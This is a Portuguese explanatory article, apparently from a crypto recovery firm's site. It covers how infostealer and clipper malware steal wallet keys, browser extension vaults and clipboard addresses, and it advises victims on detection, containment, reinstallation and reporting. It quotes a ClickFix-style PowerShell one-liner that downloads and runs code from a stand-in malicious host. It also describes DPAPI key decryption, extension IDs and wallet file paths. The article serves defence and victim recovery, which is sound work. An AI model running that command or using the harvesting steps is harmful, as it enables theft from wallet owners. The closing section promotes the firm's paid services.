Malware infostealer de criptomoedas: como os trojans atacam chaves privadas de carteiras, extensões de navegador e dados da área de transferência — detecção, desinfecção e recuperação de vítimas
O malware ladrão de informações (infostealer) emergiu como um dos vetores de ameaça mais prolíficos e devastadores que confrontam investidores de criptomoedas, participantes de finanças descentralizadas e custodiantes institucionais de ativos digitais. Ao contrário do ransomware convencional, que criptografa ruidosamente os sistemas de arquivos para exigir pagamentos de extorsão, os modernos infostealers de cripto operam em quase total silêncio. Essas cargas maliciosas de trojan penetram as defesas de endpoints, examinam sistematicamente o armazenamento em disco local e a memória do sistema, extraem cofres criptografados de extensões de navegador, colhem frases semente criptográficas e interceptam destinos de transações em tempo real. Para as vítimas que acordam com saldos zerados no MetaMask, Phantom, Coinbase Wallet ou em aplicativos desktop, compreender como essas violações ocorrem é o primeiro passo crítico para conter a exploração contínua, desinfetar a infraestrutura técnica e tomar medidas forenses decisivas para rastrear e recuperar o capital roubado.
1. Compreendendo o malware infostealer de criptomoedas: a mecânica do roubo de informações
O malware infostealer de criptomoedas representa uma categoria especializada de software trojan desenvolvido especificamente para descobrir, colher e exfiltrar segredos de autenticação, credenciais sensíveis e material criptográfico de sistemas operacionais comprometidos. Enquanto o malware tradicional historicamente se concentrava em botnets para ataques de negação de serviço distribuído (DDoS) ou criptografia disruptiva de arquivos, a moderna economia do cibercrime prioriza a extração silenciosa de ativos. Uma vez que o payload de um infostealer é executado em um endpoint, ele cumpre sua missão maliciosa em questão de segundos, muitas vezes se autoencerrando ou permanecendo dormente antes que as soluções de segurança baseadas em host possam sinalizar qualquer atividade anômala.
A comercialização dessa ameaça tem sido impulsionada pelo modelo de distribuição Malware-as-a-Service (MaaS). Em fóruns da darknet e canais ilícitos do Telegram, sindicatos especializados de desenvolvedores alugam binários compilados, painéis de administração web e ferramentas automatizadas de compilação para afiliados de baixa qualificação técnica por meio de assinaturas mensais ou esquemas de divisão de receitas. Famílias notórias de malware, incluindo RedLine Stealer, META, Vidar, Raccoon Stealer e Lumma Stealer, estabeleceram cadeias de suprimentos sofisticadas. Conforme destacado por pesquisadores de cibersegurança da SentinelOne, os operadores de infostealers utilizam estratégias de distribuição altamente direcionadas, como as campanhas ClickFix, explorando a engenharia social psicológica e a fadiga de verificação dos usuários para executar executores de scripts que baixam silenciosamente binários maliciosos a partir de infraestruturas externas de comando e controle (C2).
A escala global desse ecossistema foi evidenciada por grandes operações internacionais de aplicação da lei. No final de 2024, a Eurojust coordenou a Operação Magnus, uma coalizão multinacional envolvendo autoridades da Holanda, dos Estados Unidos, da Bélgica, de Portugal, do Reino Unido e da Austrália que desmantelou com sucesso a infraestrutura central de servidores que sustentava os infostealers RedLine e META. Registros forenses apreendidos durante a operação revelaram que essas duas variantes, isoladamente, haviam comprometido milhões de sistemas individuais em todo o mundo, colhendo bilhões de credenciais, históricos de navegação e perfis de carteiras de criptomoedas.
Conclusão técnica: o ciclo de vida operacional do infostealer
Velocidade de execução: Stealers modernos como Lumma e Vidar executam a coleta de dados, o empacotamento de arquivos e a exfiltração pela rede em menos de 45 segundos após a injeção do processo.
Ativos visados: Os payloads localizam automaticamente chaves mestras de criptografia do Chromium, descriptografam bancos de dados LevelDB de extensões, capturam arquivos de configuração de carteiras desktop e vasculham diretórios de usuários em busca de padrões mnemônicos.
Monetização automatizada: Arquivos exfiltrados ("logs") são processados por scripts de análise automatizada que classificam credenciais e encaminham imediatamente frases semente de criptomoedas para bots de drenagem automatizada.
De acordo com o Chainalysis 2026 Crypto Crime Report, os fundos roubados decorrentes de invasões por malware e comprometimentos de endpoints representam centenas de milhões de dólares em perdas on-chain anuais. Em vez de inspecionar manualmente os logs roubados, as redes de ameaças modernas utilizam analisadores automatizados de logs que processam arquivos compactados exfiltrados via requisições HTTP POST criptografadas ou APIs do Telegram Bot. Quando chaves privadas ou frases semente válidas são identificadas, contratos inteligentes e bots de transação automatizados limpam imediatamente todos os saldos associados, movimentando os ativos digitais por rotas de lavagem em múltiplos saltos em poucos minutos após a infecção inicial.
2. Como os stealers extraem chaves privadas, cofres de extensões de navegador e frases semente
Extensões de navegador Web3 não custodiais, como MetaMask, Phantom, Coinbase Wallet, Rabby e TronLink, dependem de APIs de armazenamento padrão do navegador. Tanto em navegadores baseados em Chromium (Google Chrome, Brave, Microsoft Edge, Opera) quanto em navegadores baseados em Gecko (Mozilla Firefox), o estado da extensão é gravado em diretórios do disco local formatados como bancos de dados LevelDB ou SQLite.
O mecanismo de descriptografia DPAPI do Windows
Os navegadores Chromium criptografam dados confidenciais armazenados usando uma chave mestra criptografada localizada no arquivo de configuração JSON "Local State" do navegador. No Windows, essa chave mestra é protegida pela função CryptProtectData da Windows Data Protection API (DPAPI). O DPAPI protege os segredos contra outras contas de usuário na máquina, mas qualquer executável rodando no contexto do usuário autenticado pode chamar CryptUnprotectData para descriptografar a chave mestra sem disparar avisos administrativos do Controle de Conta de Usuário (UAC).
Conforme documentado na análise da Huntress Threat Library, infostealers como o Lumma Stealer localizam o diretório Local State, executam CryptUnprotectData na chave mestra criptografada e obtêm a chave simétrica AES bruta na memória. De posse dessa chave, o malware consulta os diretórios de extensões em busca de identificadores estáticos predefinidos, como MetaMask (nkbihfbeogaeaoehlefnkodbefgpgknn) ou Phantom (bfnaelmomeimhlpmgjnjophhpkkoljpa). O malware então copia todo o banco de dados LevelDB contendo o cofre criptografado da carteira, o salt e o hash da senha.
Ponto fundamental: força bruta offline em cofres de navegadores
Exfiltração de cofres: Os stealers não tentam adivinhar as senhas das carteiras no seu endpoint. Eles transmitem os bancos de dados LevelDB criptografados para servidores externos, onde clusters distribuídos de GPUs executam ataques de dicionário e de força bruta a taxas de bilhões de hashes por segundo.
Vulnerabilidade no comprimento da senha: Senhas de extensões fracas, com 8 caracteres ou termos alfanuméricos comuns, podem ser quebradas poucos minutos após a exfiltração.
Ataque a arquivos de clientes desktop e mnemônicos não criptografados
Os infostealers também visam aplicativos autônomos de carteiras de criptomoedas para desktop. Telemetrias de ameaças da SlowMist Technology e do U.S. Department of Justice revelam que os payloads maliciosos consultam sistematicamente os caminhos de arquivo padrão de aplicativos como Electrum (%APPDATA%\Electrum\wallets), Exodus (%APPDATA%\Exodus\exodus.wallet), Atomic Wallet e Wasabi Wallet.
Os stealers incorporam ainda módulos de varredura de arquivos, vasculhando pastas como Área de Trabalho (Desktop), Documentos e Downloads em busca de formatos de texto e documentos (.txt, .docx, .pdf, .kdbx). As cargas maliciosas usam expressões regulares para detectar frases semente mnemônicas BIP-39 (12, 18 ou 24 palavras padronizadas), chaves privadas brutas de 64 caracteres e chaves de API de corretoras. Muitas variantes também realizam capturas de tela do desktop no momento da execução para coletar credenciais ou anotações exibidas.
3. Sequestradores de área de transferência e malware clipper: a ameaça silenciosa da substituição de endereços
Sequestradores de área de transferência, ou malware clipper, manipulam o buffer da área de transferência do sistema operacional em tempo real. Como os endereços públicos criptográficos são cadeias alfanuméricas longas, os usuários de criptomoedas rotineiramente copiam e colam endereços de destino ao iniciar transferências. O malware clipper subverte esse fluxo de trabalho substituindo silenciosamente o endereço do destinatário pretendido por um endereço controlado pelo invasor.
Monitoramento de API e correspondência por expressões regulares
O malware clipper monitora o buffer da área de transferência usando funções da API do Windows, como GetClipboardData e SetClipboardData. Sempre que um texto é copiado, o malware avalia a cadeia de caracteres por meio de expressões regulares otimizadas que reconhecem os principais formatos de endereço de criptomoedas:
- Bitcoin (BTC): Formatos de endereço legados P2PKH ("1"), P2SH ("3"), SegWit Bech32 ("bc1q") e Taproot ("bc1p").
- Ethereum e redes EVM (ETH, BNB, MATIC): Cadeias hexadecimais de 40 caracteres iniciadas pelo prefixo "0x".
- Solana (SOL): Cadeias codificadas em Base58 contendo entre 32 e 44 caracteres alfanuméricos.
- TRON (TRX / USDT-TRC20): Cadeias de 34 caracteres iniciadas com a letra "T".
Quando um padrão de endereço é detectado, o clipper substitui imediatamente o conteúdo do buffer por um endereço pertencente ao invasor na mesma rede blockchain em milissegundos, tornando a alteração imperceptível durante fluxos convencionais de copiar e colar.
Evasão com endereços personalizados (vanity) e subversão de carteiras de hardware
Pesquisas acadêmicas publicadas no arXiv detalhando o ataque "EthClipper" demonstram como os adversários pré-geram milhões de endereços vanity que coincidem com os 4 a 6 primeiros e os 4 a 6 últimos caracteres dos endereços das vítimas. Como o hábito visual humano normalmente confere apenas o prefixo e o sufixo de um endereço, as vítimas aprovam rotineiramente transações para endereços fraudulentos visualmente similares controlados pelo invasor.
Risco crítico: carteiras de hardware não são imunes a clippers
Integridade da máquina hospedeira: Uma carteira de hardware protege as chaves privadas contra extração, mas não pode impedir que o usuário assine uma transação destinada ao endereço errado.
Verificação na tela: Se um clipper substituir o endereço no seu computador, a carteira de hardware exibirá o endereço substituído em sua tela física. Deixar de inspecionar cada caractere na tela do dispositivo permite que ataques de clippers com endereços vanity sejam bem-sucedidos.
Dados documentados pela SlowMist Technology mostram módulos de clipper integrados diretamente em pacotes de infostealers ou distribuídos por meio de utilitários Web3 trojanizados. Como os clippers exigem um código mínimo, eles mantêm um consumo de memória excepcionalmente leve e evitam assinaturas estáticas de antivírus, permanecendo ativos nos endpoints por meses.
4. Vetores de distribuição dos cibercriminosos: malvertising, software pirata e iscas de phishing
Sindicatos modernos de infostealers operam redes de distribuição multicanal projetadas para induzir alvos a executar código malicioso. Investidores de criptomoedas, engenheiros Web3 e negociantes de ativos digitais são visados por meio de manipulação de mecanismos de busca, engenharia social e cadeias de suprimentos digitais comprometidas.
Campanhas de malvertising em mecanismos de busca
Um vetor proeminente é a falsificação de anúncios em mecanismos de busca. O Internet Crime Complaint Center (IC3) do Federal Bureau of Investigation (FBI) publicou um alerta de utilidade pública detalhando como cibercriminosos compram anúncios patrocinados no Google Ads e no Bing Ads. Os atores maliciosos dão lances em termos de busca de alta intenção, como "download metamask", "phantom wallet extension", "tradingview desktop" ou "exodus wallet download".
Quando um usuário realiza a pesquisa, o anúncio patrocinado fraudulento aparece acima dos resultados orgânicos. Ao clicar, a vítima é redirecionada por meio de filtros de cloaking que exibem conteúdo inofensivo para rastreadores de mecanismos de busca, enquanto entregam um clone exato do projeto legítimo aos usuários. O download do instalador executa um dropper ofuscado contendo variantes como RedLine, Vidar ou Lumma Stealer.
A técnica de ataque de verificação ClickFix
Pesquisas de segurança da SentinelOne e da Qualys Threat Research destacam a proliferação do ataque de engenharia social denominado "ClickFix". Sites maliciosos exibem erros simulados, como falsos desafios de CAPTCHA da Cloudflare, avisos de codecs de vídeo corrompidos ou alertas forjados de atualização do navegador.
O usuário é instruído a pressionar Tecla Windows + R, colar uma cadeia copiada na caixa Executar e pressionar Enter. Na realidade, o payload copiado na área de transferência contém um comando PowerShell ofuscado (como powershell -w hidden -c "iex(New-Object Net.WebClient).DownloadString('https://malicious-cdn...')"). Como o próprio usuário executa o comando manualmente, as soluções de proteção de endpoint costumam tratá-lo como atividade administrativa legítima, contornando firewalls perimetrais.
Detalhamento dos vetores de distribuição: principais fontes de infecção
Anúncios em motores de busca: Anúncios falsos no topo dos resultados imitando softwares de carteiras de hardware, extensões Web3 e terminais de negociação.
Iscas de CAPTCHA interativo: Avisos de ClickFix que induzem usuários a executar scripts PowerShell codificados em base64 na janela Executar do Windows.
Iscas de recrutamento e emprego para desenvolvedores: Ofertas de trabalho fraudulentas no Telegram, Discord e LinkedIn exigindo que desenvolvedores testem repositórios de código contendo dependências maliciosas do npm.
Portais de suporte falsificados e abordagem direta fraudulenta
Em um alerta posterior, o FBI IC3 destacou o aumento de portais de suporte técnico falsificados e contatos fraudulentos voltados a desenvolvedores. Em comunidades de desenvolvedores de criptomoedas, criminosos se passam por recrutadores ou fundadores de startups Web3, convidando candidatos para avaliações de código. Os repositórios fornecidos contêm dependências armadas com malware que executam um payload de infostealer no instante em que o comando npm install é iniciado.
5. Sinais de alerta: como identificar uma infecção ativa de infostealer no seu dispositivo
Os infostealers são projetados para operar de forma furtiva, mas a sua execução gera artefatos forenses distintos e anomalias de comportamento. Detectar uma infecção ativa antes que os invasores concluam a monetização dos dados exfiltrados pode evitar a perda total dos ativos.
Indicadores de comportamento no endpoint
Como os infostealers interagem diretamente com o armazenamento de arquivos locais e processos do navegador, as vítimas frequentemente observam interrupções repentinas. Pesquisas da Huntress Threat Library e da Qualys revelam diversos indicadores proeminentes no endpoint:
- Fechamento inesperado do navegador e reinício de perfis: Os stealers encerram processos em execução dos navegadores (como
chrome.exeoubrave.exe) para liberar os bloqueios de arquivo sobre as bases SQLite e LevelDB. - Janelas de terminal piscando rapidamente: Janelas breves de prompt de comando ou console do PowerShell que surgem por uma fração de segundo durante a inicialização do sistema ou após clicar em um link da web.
- Adulteração de antimalware: Inclusões não autorizadas no caminho do Registro de Exclusões do Windows Defender (
HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths). - Processos incomuns em segundo plano: Executáveis com nomes aleatórios sendo executados a partir de diretórios temporários, como
%APPDATA%ouC:\Users\Public\, consumindo ciclos erráticos de CPU.
Anomalias de tráfego de rede e comunicação
Telemetrias publicadas pela Darktrace Threat Insights destacam assinaturas de rede associadas à exfiltração por infostealers. Após colher arquivos locais, o malware compacta senhas, cookies e chaves de carteiras em arquivos criptografados, iniciando requisições de saída HTTP POST para servidores C2 remotos ou utilizando canais da API do Telegram Bot (como requisições direcionadas para api.telegram.org/bot[token]/sendDocument).
Sinais de alerta comportamentais on-chain
Transferências de financiamento para taxa de gas: Invasores depositam pequenas quantias de tokens nativos de gas (ETH, SOL ou TRX) na sua carteira a partir de endereços intermediários desconhecidos para viabilizar as taxas necessárias para transferir saldos maiores de stablecoins.
Varreduras automáticas de saldo: Esvaziamento repentino dos saldos da carteira sem solicitações correspondentes de assinatura na extensão do navegador.
Roteamento em múltiplos saltos: Análises de inteligência blockchain da TRM Labs mostram que transações de drenagem por stealers são roteadas em segundos através de exchanges descentralizadas ou pontes cross-chain.
6. Contenção de emergência: isolando sistemas comprometidos e protegendo ativos digitais
Se suspeitar que um infostealer foi executado no seu computador ou observar transações não autorizadas, a contenção imediata é crucial. O pânico frequentemente leva as vítimas a executar longas varreduras de antivírus na máquina infectada, o que permite que a exfiltração em andamento seja concluída ou pode acionar rotinas de destruição de dados (wiper).
Passo 1: Interrompa imediatamente toda a conectividade de rede
O isolamento total da rede é a primeira medida mandatória. Desconecte cabos físicos de rede Ethernet, desative o Wi-Fi e o Bluetooth ou ative o modo avião no dispositivo. Encerrar a conexão com a internet rompe os sockets ativos com o C2, interrompe exfiltrações pendentes e impede a execução remota de comandos. Não reinicie o computador de imediato, pois a memória RAM volátil armazena dados forenses valiosos.
Passo 2: Migre para um ambiente limpo e isolado
Nunca tente resgatar ativos de criptomoedas a partir do dispositivo infectado. Qualquer toque de tecla ou frase semente digitada em um sistema comprometido pode ser interceptado por keyloggers ativos. Conforme enfatizado nos alertas conjuntos de cibersegurança do FBI IC3, toda a resposta ao incidente deve ocorrer a partir de um dispositivo sabidamente limpo:
- Utilize um computador secundário limpo ou um smartphone recém-configurado conectado via dados móveis (não utilize a rede Wi-Fi local comprometida).
- Configure uma carteira de hardware completamente nova ou uma nova carteira de software gerada com uma frase de recuperação totalmente inédita.
- Nunca importe uma frase de recuperação comprometida: Não importe a frase semente existente para um novo dispositivo. Uma vez que a frase semente foi exposta, todos os endereços públicos derivados dela em qualquer rede blockchain tornam-se permanentemente inseguros.
Triagem prática: hierarquia de evacuação de ativos
Prioridade 1: Tokens líquidos transferíveis: Transfira imediatamente tokens líquidos de alto valor (Bitcoin, Ethereum, Solana, USDT, USDC) para o seu endereço recém-gerado em armazenamento a frio (cold storage) seguro.
Prioridade 2: Posições em stake e ativos bloqueados: Revise os protocolos de finanças descentralizadas onde você possui garantias bloqueadas. Se os prazos de desbloqueio permitirem, inicie os resgates para endereços limpos ou revogue as permissões contratuais para impedir a drenagem.
Prioridade 3: Contas em corretoras centralizadas: Acesse corretoras centralizadas (Binance, Coinbase, Kraken) a partir do seu dispositivo limpo. Encerre todas as sessões ativas, redefina senhas, renove as chaves de autenticação de dois fatores (2FA) e desative chaves de API ativas.
Passo 3: Revogue aprovações ativas e tokens de sessão
Caso permissões de contratos inteligentes tenham sido concedidas anteriormente a partir da carteira afetada, utilize uma ferramenta de gestão de permissões como o Revoke.cash ou interfaces oficiais de exploradores de blocos a partir de seu dispositivo limpo. Embora a revogação de permissões não impeça um criminoso em posse de chaves privadas brutas de transferir moedas nativas, ela impede que contratos drenadores automatizados varram os saldos de tokens autorizados.
7. Desinfecção completa do dispositivo e reconstrução de ambiente seguro
Um erro comum cometido por vítimas de malware é confiar em softwares antivírus comerciais para "limpar" um sistema infectado. Embora um scanner de endpoint possa detectar o executável do dropper inicial, os infostealers injetam shellcode em processos legítimos do sistema operacional, alteram configurações de inicialização, criam tarefas agendadas e instalam ferramentas secundárias de acesso remoto ou clippers persistentes nos diretórios do sistema.
A necessidade de reinstalação do sistema operacional do zero (bare-metal)
Conforme documentado em relatórios forenses decorrentes de ações policiais do Department of Justice contra redes de infostealers, os payloads estabelecem frequentemente mecanismos profundos de persistência. Análises de ameaças da Darktrace confirmam que variantes avançadas sobrevivem a pontos de restauração convencionais do sistema. Restaurar a integridade computacional exige uma reinstalação completa e do zero (bare-metal):
- Crie a mídia de instalação em um dispositivo limpo: Prepare uma unidade USB de inicialização usando a ferramenta oficial Media Creation Tool da Microsoft ou uma distribuição oficial do Linux a partir de um computador comprovadamente seguro e não infectado.
- Execute a repartição e formatação completa da unidade: Exclua todas as partições de disco existentes e realize uma formatação completa do drive. Evite opções de "restauração simples" ou "manter meus arquivos", pois binários maliciosos podem permanecer ocultos nos diretórios preservados de dados do usuário.
- Atualize o firmware UEFI/BIOS da placa-mãe: Instale a versão mais recente do firmware diretamente a partir do portal do fabricante para mitigar ameaças de persistência no nível de firmware.
Invalidação de credenciais e encerramento de sessões
Como os infostealers coletam cookies de sessão ativos dos navegadores, os invasores conseguem burlar a autenticação multifator (MFA) por meio do sequestro de sessão (session hijacking). Reinstalar o sistema operacional não invalida os cookies que já foram transmitidos para os servidores C2. A partir de um dispositivo secundário seguro, invalide manualmente todas as sessões ativas em seus provedores de e-mail, gerenciadores de senhas, plataformas em nuvem e corretoras de criptomoedas, selecionando a opção "Encerrar todas as outras sessões".
Protocolo de endurecimento: arquitetura futura de endpoints
Endpoints dedicados para transações: Usuários frequentes da Web3 devem segregar suas atividades mantendo um laptop dedicado e protegido exclusivamente para assinar transações em blockchain.
Verificação física na carteira de hardware: Mitigue os riscos de adulteração da área de transferência identificados na pesquisa acadêmica EthClipper conferindo atentamente cada caractere do endereço de destino na tela física da carteira de hardware antes de transmitir a transação.
8. Triagem de ativos roubados: rastreamento em blockchain, denúncia policial e recursos legais
Assim que a contenção do endpoint e as redefinições de credenciais forem concluídas, a resposta da vítima passa para a triagem de ativos e a recuperação forense. A natureza descentralizada das blockchains públicas impede a reversão de transações por administradores de rede. No entanto, a arquitetura de livro-razão transparente do Bitcoin, Ethereum, Solana e outras redes oferece um rastro de auditoria indelével que peritos forenses e autoridades policiais utilizam para rastrear os valores subtraídos.
Preservação de evidências forenses
Antes de acionar investigadores ou formalizar denúncias oficiais, elabore um dossiê completo do incidente. Registre todos os hashes de transação (TXIDs) vinculados à movimentação não autorizada, carimbos de data e hora (timestamps) de execução, redes blockchain envolvidas, endereços de destino do criminoso e contratos dos tokens. Exporte os metadados brutos em JSON dos exploradores de blocos, como Etherscan, Solscan ou Tronscan. Caso tenha havido interação com falsos recrutadores ou sites maliciosos, guarde as URLs completas, endereços IP de hospedagem e históricos de conversas.
Rastreamento on-chain e análise de múltiplos saltos
Os atores maliciosos não mantêm as criptomoedas roubadas nas carteiras iniciais de coleta. Pesquisas da TRM Labs e da Chainalysis evidenciam que os criminosos utilizam scripts de lavagem automatizados para dispersar rapidamente os recursos por dezenas de endereços intermediários. Os ativos circulam por pools de liquidez descentralizadas, pontes entre redes (cross-chain) ou serviços de mixagem de moedas.
Empresas profissionais de inteligência blockchain utilizam ferramentas analíticas de grafos para rastrear o fluxo dos recursos através de estruturas complexas de lavagem de capitais. Como essas organizações criminosas precisam, ao final, de liquidez em moedas fiduciárias, os ativos roubados acabam sendo encaminhados para prestadores de serviços de ativos virtuais (VASPs) centralizados ou negociadores de balcão (OTC). Quando o rastreamento on-chain identifica depósitos em corretoras regulamentadas, os investigadores acionam com agilidade as autoridades competentes para requerer o congelamento de emergência das contas junto às equipes de conformidade antes da conversão para moeda fiduciária.
Recursos legais e canais de denúncia às autoridades policiais
Registro no FBI IC3: Vítimas nos Estados Unidos devem registrar uma ocorrência detalhada imediatamente no portal ic3.gov, classificando o fato como intrusão cibernética e furto de moeda virtual, incluindo todos os hashes de transações e endereços de carteira do invasor.
Autoridades internacionais: Vítimas na Europa devem prestar queixa junto às unidades policiais especializadas em crimes cibernéticos de seus países, citando as diretrizes de cooperação da Operação Magnus coordenadas pela Eurojust e Europol.
Ordens judiciais de bloqueio: Em incidentes com perdas financeiras expressivas, advogados especializados em recuperação de ativos digitais podem obter ordens judiciais de exibição de documentos ex parte (como ordens Norwich Pharmacal ou Bankers Trust em jurisdições de common law) para obrigar corretoras a congelar ativos roubados e fornecer os registros de identificação de conheça-seu-cliente (KYC).
Suspeita que sua carteira de criptomoedas foi comprometida por um infostealer?
A Recoveris é uma empresa de inteligência blockchain e recuperação de ativos digitais sediada em Zug, Suíça. Se suas chaves privadas, frases semente ou cofres de extensões de navegador foram colhidos por malware, nossa equipe forense pode avaliar seu incidente, rastrear fluxos on-chain e coordenar congelamentos de emergência com corretoras.
Aja rapidamente: a janela para congelamentos emergenciais em corretoras é crítica antes que os ativos sejam convertidos em moeda fiduciária.
Contatar a Recoveris para avaliação de incidenteTeste sua prontidão para recuperação
Quão preparado você está para responder a uma invasão de malware ou a uma carteira comprometida? Realize nossa avaliação diagnóstica estruturada para avaliar sua capacidade de resposta a incidentes e potencial de recuperação.
Iniciar avaliação de recuperação3-5 minutos • 10 perguntas • Resumo personalizado instantâneo
Referências
- 1.Chainalysis. (2026). The 2026 Crypto Crime Report & Stolen Funds Ecosystem. Disponível em: https://www.chainalysis.com/reports/crypto-crime-2026/
- 2.TRM Labs. (2026). Cross-Chain Tracing and Multi-Hop Obfuscation in Cybercrime Investigations. Disponível em: https://www.trmlabs.com/glossary/cross-chain-tracing
- 3.FBI Internet Crime Complaint Center (IC3). (2022). Cybercriminals Use Search Engine Advertisement Services to Impersonate Legitimate Brands and Deliver Malware. Disponível em: https://www.ic3.gov/PSA/2022/PSA221221
- 4.Eurojust. (2024). Malware Targeting Millions of People Taken Down by International Coalition (Operation Magnus). Disponível em: https://www.eurojust.europa.eu/news/malware-targeting-millions-people-taken-down-international-coalition
- 5.U.S. Department of Justice (DOJ). (2024). U.S. Joins International Action Against RedLine and META Infostealers. Disponível em: https://www.justice.gov/usao-wdtx/pr/us-joins-international-action-against-redline-and-meta-infostealers
- 6.Academic Research (arXiv). (2021). EthClipper: A Clipboard Meddling Attack on Hardware Wallets with Address Verification Evasion. Disponível em: https://arxiv.org/abs/2108.14004
- 7.FBI Internet Crime Complaint Center (IC3). (2025). Public Service Announcement on Spoofed Tech Portals and Fraudulent Support Entities. Disponível em: https://www.ic3.gov/PSA/2025/PSA250919
- 8.SentinelOne. (2025). How ClickFix is Weaponizing Verification Fatigue to Deliver RATs and Infostealers. Disponível em: https://www.sentinelone.com/blog/how-clickfix-is-weaponizing-verification-fatigue-to-deliver-rats-infostealers/
- 9.Qualys Threat Research. (2024). Unmasking Lumma Stealer: Analyzing Deceptive Tactics with Fake CAPTCHA. Disponível em: https://blog.qualys.com/vulnerabilities-threat-research/2024/10/20/unmasking-lumma-stealer-analyzing-deceptive-tactics-with-fake-captcha
- 10.Huntress Threat Library. (2025). Lumma Stealer Behavioral Profile, Persistence, and Data Exfiltration. Disponível em: https://www.huntress.com/threat-library/malware/lumma-stealer
- 11.Darktrace Threat Insights. (2025). The Rise of the Lumma Info Stealer and Wallet Harvesting Campaigns. Disponível em: https://www.darktrace.com/blog/the-rise-of-the-lumma-info-stealer
- 12.SlowMist Technology. (2026). Web3 Wallet Attack Vectors and Malicious Extension Exploits. Disponível em: https://hacked.slowmist.io/?c=Wallet&page=1
Perguntas frequentes
Um infostealer pode roubar fundos de uma carteira de hardware como Ledger ou Trezor?
Os infostealers não conseguem extrair chaves privadas armazenadas com segurança dentro do elemento seguro de uma carteira de hardware. No entanto, sequestradores de área de transferência (clippers) podem substituir silenciosamente os endereços de destino durante as transações, e alertas falsos de atualização de firmware ou de software podem induzir usuários a digitar as palavras de recuperação diretamente no teclado do computador.
Se meu antivírus removeu o trojan stealer, minha carteira de criptomoedas está segura para uso?
Não. Os infostealers normalmente concluem a exfiltração de dados em poucos segundos após a execução, transmitindo os cofres de extensões de navegador e chaves em cache para servidores de comando e controle antes que a heurística dos antivírus tradicionais seja acionada. Uma vez que o dispositivo executou um stealer, todas as hot wallets nele presentes devem ser consideradas permanentemente comprometidas.
Como os sequestradores de área de transferência contornam a verificação visual de endereços?
Clippers avançados de área de transferência geram milhões de endereços personalizados (vanity) de criptomoedas que coincidem com os 4 a 6 caracteres iniciais e finais dos formatos de destino mais utilizados. Quando os usuários verificam apenas o início e o fim de um endereço colado, acabam confirmando inadvertidamente transações para carteiras controladas pelo invasor.
Criptomoedas roubadas por operadores de infostealer podem ser recuperadas?
Embora transferências descentralizadas em blockchain não possam ser revertidas diretamente, os fundos podem ser rastreados forensemente através de múltiplos saltos e pontes cross-chain. Quando os ativos roubados chegam a corretoras centralizadas ou pontos regulamentados de saída fiat (off-ramps), bloqueios judiciais de emergência e a cooperação com as autoridades policiais podem assegurar os saldos para recuperação.
Um infostealer pode infectar dispositivos macOS ou Linux, ou apenas computadores Windows são visados?
Embora o Windows represente o alvo principal devido à sua ampla fatia de mercado em desktops e à implementação do armazenamento via DPAPI, sindicatos cibercriminosos distribuem ativamente stealers multiplataforma desenvolvidos em Go e Rust, além de variantes dedicadas para macOS, como o Atomic macOS Stealer (AMOS), que extraem credenciais do Apple Keychain e cofres de extensões de carteiras nos navegadores.